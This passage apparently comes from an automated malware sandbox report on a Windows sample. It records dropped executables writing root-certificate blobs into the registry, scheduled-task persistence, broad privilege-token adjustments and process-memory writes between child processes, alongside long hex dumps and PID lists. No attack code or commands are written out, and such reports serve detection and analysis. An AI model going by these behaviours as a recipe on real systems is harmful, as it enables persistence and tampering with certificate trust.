0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 1225f1d26c.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 1225f1d26c.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a d317e9c8c3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 d317e9c8c3.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a d317e9c8c3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 7aencsM.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 7aencsM.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2944 schtasks.exe 2564 schtasks.exe 264 schtasks.exe 3516 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1160 apisysDirectx.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1156 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe 1976 skotes.exe 1848 NL58452.exe 1848 NL58452.exe 1848 NL58452.exe 1848 NL58452.exe 580 f3Ypd8O.exe 580 f3Ypd8O.exe 580 f3Ypd8O.exe 580 f3Ypd8O.exe 2352 kdMujZh.exe 2352 kdMujZh.exe 2104 meuldlt.exe 1076 MAl7pjE.exe 628 sQ3DZPU.exe 1076 MAl7pjE.exe 1076 MAl7pjE.exe 1076 MAl7pjE.exe 1076 MAl7pjE.exe 1180 powershell.exe 2664 powershell.exe 1504 powershell.exe 1180 powershell.exe 1180 powershell.exe 1300 TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE 2120 msiexec.exe 2120 msiexec.exe 2360 powershell.exe 2232 95b5695165.exe 1504 powershell.exe 1300 TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE 1300 TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 3016 edfeb1d137.exe 1504 powershell.exe 1504 powershell.exe 1428 483d2fa8a0d53818306efeb32d3.exe 2240 5c9cf0fb93.exe 2240 5c9cf0fb93.exe 1224 1225f1d26c.exe 1224 1225f1d26c.exe 1224 1225f1d26c.exe 1224 1225f1d26c.exe 1224 1225f1d26c.exe 1472 Bjkm5hE.exe 1472 Bjkm5hE.exe 1472 Bjkm5hE.exe 1472 Bjkm5hE.exe 2948 f3Ypd8O.exe 2948 f3Ypd8O.exe 2948 f3Ypd8O.exe 2948 f3Ypd8O.exe 2524 monthdragon.exe 2524 monthdragon.exe 2524 monthdragon.exe 2524 monthdragon.exe 3240 MAl7pjE.exe 3240 MAl7pjE.exe 1728 DTQCxXZ.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1168 a1EoH8b.exe Token: SeShutdownPrivilege 868 msiexec.exe Token: SeIncreaseQuotaPrivilege 868 msiexec.exe Token: SeRestorePrivilege 2120 msiexec.exe Token: SeTakeOwnershipPrivilege 2120 msiexec.exe Token: SeSecurityPrivilege 2120 msiexec.exe Token: SeCreateTokenPrivilege 868 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 868 msiexec.exe Token: SeLockMemoryPrivilege 868 msiexec.exe Token: SeIncreaseQuotaPrivilege 868 msiexec.exe Token: SeMachineAccountPrivilege 868 msiexec.exe Token: SeTcbPrivilege 868 msiexec.exe Token: SeSecurityPrivilege 868 msiexec.exe Token: SeTakeOwnershipPrivilege 868 msiexec.exe Token: SeLoadDriverPrivilege 868 msiexec.exe Token: SeSystemProfilePrivilege 868 msiexec.exe Token: SeSystemtimePrivilege 868 msiexec.exe Token: SeProfSingleProcessPrivilege 868 msiexec.exe Token: SeIncBasePriorityPrivilege 868 msiexec.exe Token: SeCreatePagefilePrivilege 868 msiexec.exe Token: SeCreatePermanentPrivilege 868 msiexec.exe Token: SeBackupPrivilege 868 msiexec.exe Token: SeRestorePrivilege 868 msiexec.exe Token: SeShutdownPrivilege 868 msiexec.exe Token: SeDebugPrivilege 868 msiexec.exe Token: SeAuditPrivilege 868 msiexec.exe Token: SeSystemEnvironmentPrivilege 868 msiexec.exe Token: SeChangeNotifyPrivilege 868 msiexec.exe Token: SeRemoteShutdownPrivilege 868 msiexec.exe Token: SeUndockPrivilege 868 msiexec.exe Token: SeSyncAgentPrivilege 868 msiexec.exe Token: SeEnableDelegationPrivilege 868 msiexec.exe Token: SeManageVolumePrivilege 868 msiexec.exe Token: SeImpersonatePrivilege 868 msiexec.exe Token: SeCreateGlobalPrivilege 868 msiexec.exe Token: SeCreateTokenPrivilege 868 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 868 msiexec.exe Token: SeLockMemoryPrivilege 868 msiexec.exe Token: SeIncreaseQuotaPrivilege 868 msiexec.exe Token: SeMachineAccountPrivilege 868 msiexec.exe Token: SeTcbPrivilege 868 msiexec.exe Token: SeSecurityPrivilege 868 msiexec.exe Token: SeTakeOwnershipPrivilege 868 msiexec.exe Token: SeLoadDriverPrivilege 868 msiexec.exe Token: SeSystemProfilePrivilege 868 msiexec.exe Token: SeSystemtimePrivilege 868 msiexec.exe Token: SeProfSingleProcessPrivilege 868 msiexec.exe Token: SeIncBasePriorityPrivilege 868 msiexec.exe Token: SeCreatePagefilePrivilege 868 msiexec.exe Token: SeCreatePermanentPrivilege 868 msiexec.exe Token: SeBackupPrivilege 868 msiexec.exe Token: SeRestorePrivilege 868 msiexec.exe Token: SeShutdownPrivilege 868 msiexec.exe Token: SeDebugPrivilege 868 msiexec.exe Token: SeAuditPrivilege 868 msiexec.exe Token: SeSystemEnvironmentPrivilege 868 msiexec.exe Token: SeChangeNotifyPrivilege 868 msiexec.exe Token: SeRemoteShutdownPrivilege 868 msiexec.exe Token: SeUndockPrivilege 868 msiexec.exe Token: SeSyncAgentPrivilege 868 msiexec.exe Token: SeEnableDelegationPrivilege 868 msiexec.exe Token: SeManageVolumePrivilege 868 msiexec.exe Token: SeImpersonatePrivilege 868 msiexec.exe Token: SeCreateGlobalPrivilege 868 msiexec.exe -
Suspicious use of FindShellTrayWindow 24 IoCs
pid Process 1156 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe 868 msiexec.exe 1580 b95bc460f0.exe 1580 b95bc460f0.exe 1580 b95bc460f0.exe 868 msiexec.exe 2248 amnew.exe 2856 f5719c55e7.exe 2856 f5719c55e7.exe 2856 f5719c55e7.exe 2856 f5719c55e7.exe 2856 f5719c55e7.exe 2856 f5719c55e7.exe 2044 31459b3435.exe 2044 31459b3435.exe 2044 31459b3435.exe 3296 firefox.exe 3296 firefox.exe 3296 firefox.exe 3296 firefox.exe 2856 f5719c55e7.exe 2856 f5719c55e7.exe 2856 f5719c55e7.exe 2856 f5719c55e7.exe -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 1580 b95bc460f0.exe 1580 b95bc460f0.exe 1580 b95bc460f0.exe 2856 f5719c55e7.exe 2856 f5719c55e7.exe 2856 f5719c55e7.exe 2856 f5719c55e7.exe 2856 f5719c55e7.exe 2856 f5719c55e7.exe 2044 31459b3435.exe 2044 31459b3435.exe 2044 31459b3435.exe 3296 firefox.exe 3296 firefox.exe 3296 firefox.exe 2856 f5719c55e7.exe 2856 f5719c55e7.exe 2856 f5719c55e7.exe 2856 f5719c55e7.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1156 wrote to memory of 1976 1156 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe 30 PID 1156 wrote to memory of 1976 1156 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe 30 PID 1156 wrote to memory of 1976 1156 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe 30 PID 1156 wrote to memory of 1976 1156 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe 30 PID 1976 wrote to memory of 2176 1976 skotes.exe 32 PID 1976 wrote to memory of 2176 1976 skotes.exe 32 PID 1976 wrote to memory of 2176 1976 skotes.exe 32 PID 1976 wrote to memory of 2176 1976 skotes.exe 32 PID 1976 wrote to memory of 1256 1976 skotes.exe 33 PID 1976 wrote to memory of 1256 1976 skotes.exe 33 PID 1976 wrote to memory of 1256 1976 skotes.exe 33 PID 1976 wrote to memory of 1256 1976 skotes.exe 33 PID 1256 wrote to memory of 1760 1256 NL58452.exe 34 PID 1256 wrote to memory of 1760 1256 NL58452.exe 34 PID 1256 wrote to memory of 1760 1256 NL58452.exe 34 PID 1256 wrote to memory of 1760 1256 NL58452.exe 34 PID 1256 wrote to memory of 1848 1256 NL58452.exe 35 PID 1256 wrote to memory of 1848 1256 NL58452.exe 35 PID 1256 wrote to memory of 1848 1256 NL58452.exe 35 PID 1256 wrote to memory of 1848 1256 NL58452.exe 35 PID 1256 wrote to memory of 1848 1256 NL58452.exe 35 PID 1256 wrote to memory of 1848 1256 NL58452.exe 35 PID 1256 wrote to memory of 1848 1256 NL58452.exe 35 PID 1256 wrote to memory of 1848 1256 NL58452.exe 35 PID 1256 wrote to memory of 1848 1256 NL58452.exe 35 PID 1256 wrote to memory of 1848 1256 NL58452.exe 35 PID 1256 wrote to memory of 2392 1256 NL58452.exe 36 PID 1256 wrote to memory of 2392 1256 NL58452.exe 36 PID 1256 wrote to memory of 2392 1256 NL58452.exe 36 PID 1256 wrote to memory of 2392 1256 NL58452.exe 36 PID 1976 wrote to memory of 696 1976 skotes.exe 38 PID 1976 wrote to memory of 696 1976 skotes.exe 38 PID 1976 wrote to memory of 696 1976 skotes.exe 38 PID 1976 wrote to memory of 696 1976 skotes.exe 38 PID 696 wrote to memory of 580 696 f3Ypd8O.exe 39 PID 696 wrote to memory of 580 696 f3Ypd8O.exe 39 PID 696 wrote to memory of 580 696 f3Ypd8O.exe 39 PID 696 wrote to memory of 580 696 f3Ypd8O.exe 39 PID 696 wrote to memory of 580 696 f3Ypd8O.exe 39 PID 696 wrote to memory of 580 696 f3Ypd8O.exe 39 PID 696 wrote to memory of 580 696 f3Ypd8O.exe 39 PID 696 wrote to memory of 580 696 f3Ypd8O.exe 39 PID 696 wrote to memory of 580 696 f3Ypd8O.exe 39 PID 696 wrote to memory of 580 696 f3Ypd8O.exe 39 PID 696 wrote to memory of 864 696 f3Ypd8O.exe 40 PID 696 wrote to memory of 864 696 f3Ypd8O.exe 40 PID 696 wrote to memory of 864 696 f3Ypd8O.exe 40 PID 696 wrote to memory of 864 696 f3Ypd8O.exe 40 PID 1976 wrote to memory of 2352 1976 skotes.exe 41 PID 1976 wrote to memory of 2352 1976 skotes.exe 41 PID 1976 wrote to memory of 2352 1976 skotes.exe 41 PID 1976 wrote to memory of 2352 1976 skotes.exe 41 PID 1976 wrote to memory of 628 1976 skotes.exe 42 PID 1976 wrote to memory of 628 1976 skotes.exe 42 PID 1976 wrote to memory of 628 1976 skotes.exe 42 PID 1976 wrote to memory of 628 1976 skotes.exe 42 PID 2892 wrote to memory of 2104 2892 taskeng.exe 44 PID 2892 wrote to memory of 2104 2892 taskeng.exe 44 PID 2892 wrote to memory of 2104 2892 taskeng.exe 44 PID 2892 wrote to memory of 2104 2892 taskeng.exe 44 PID 1976 wrote to memory of 1168 1976 skotes.exe 45 PID 1976 wrote to memory of 1168 1976 skotes.exe 45 PID 1976 wrote to memory of 1168 1976 skotes.exe 45 PID 1976 wrote to memory of 1168 1976 skotes.exe 45 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
